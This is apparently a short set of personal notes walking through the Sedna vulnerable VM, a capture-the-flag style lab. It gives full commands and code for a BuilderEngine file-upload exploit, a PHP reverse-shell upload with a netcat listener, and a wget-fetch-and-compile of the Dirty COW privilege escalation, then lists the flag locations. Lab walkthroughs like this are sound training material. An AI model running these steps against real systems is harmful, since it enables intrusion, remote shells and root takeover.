These are my notes from running through the Sedna vulnerable VM.

Run discover content in Burp to map the application out. You can also run Nikto to try and find any vulnerabilities.

Observe /license.txt - it will inform us that the target web application is running BuilderEngine.

Search for an exploit we can use:

searchsploit builderengine

View the source for the exploit:

searchsploit -x 40390

Copy the exploit code into exploit.html:

<html>
  <body>
    <form
      method="post"
      action="http://<vulnerable ip>/themes/dashboard/assets/plugins/jquery-file-upload/server/php/"
      enctype="multipart/form-data"
    >
      <input type="file" name="files[]" />
      <input type="submit" value="send" />
    </form>
  </body>
</html>

Host it:

python -m SimpleHTTPServer 8000 # make sure exploit.html is in this directory

In a web browser: http://127.0.0.1:8000/exploit.html

Modify the laudanum backdoor to match the IP address and whatever port for our attacker machine. We can get this from here.

Upload laudanum backdoor through exploit.html:

Click Choose File, specify php-reverse-shell.php Click send

Start listener on attacker:

nc -lvp 8888

Initiate connection:

http://<vulnerable ip>/files/php-reverse-shell.php

After getting the reverse shell:

python -c 'import pty;pty.spawn("/bin/bash")' # get real shell

To elevate our privileges, we’ll use dirtyc0w. Get it and compile it:

cd /tmp && wget https://www.exploit-db.com/download/40839 && mv 40839 40839.c && gcc -pthread -o dirty 40839.c -lcrypt

Run it:

./dirty nicepassword

Access the system:

ssh firefart@192.168.1.182

For stability, run this immediately once you’re in:

echo 0 > /proc/sys/vm/dirty_writeback_centisecs

The flags can be found in:

  • /var/www/flag.txt

  • /root/flag.txt

  • /etc/tomcat7/tomcat-users.xml